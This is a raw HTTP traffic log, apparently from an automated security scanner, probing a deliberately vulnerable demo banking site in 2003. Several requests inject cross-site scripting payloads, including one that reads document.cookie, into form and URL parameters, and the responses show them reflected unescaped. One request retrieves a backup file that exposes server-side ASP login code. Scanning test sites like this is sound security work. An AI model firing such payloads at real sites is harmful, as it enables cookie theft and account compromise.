POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 135
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 116
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data </textarea><script>alert('XSS')</script><br>Please try again.
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=</textarea><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=test@<script>alert(document.cookie)</script>.com&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /plink.asp?a=1"style="background:url(javascript:alert('XSS'))"%20"&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 217
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = 1"style="background:url(javascript:alert('XSS'))" "</P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /linking/link1/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:08 GMT
ETag: "9a33cffca9dc11:8f6"
Content-Length: 37
<A HREF="./link2/index.htm">Link2</A>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:29 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>>"><script>alert('XSS')</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=>"><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /_private/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_private/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /forgot2.asp?msg2=no&msg=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1865
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">1"style="background:url(javascript:alert('XSS'))" "</td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /default.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/error.html
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /rootlogin.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:03 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "3cfb65c1a8dc11:8f6"
Content-Length: 1354
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
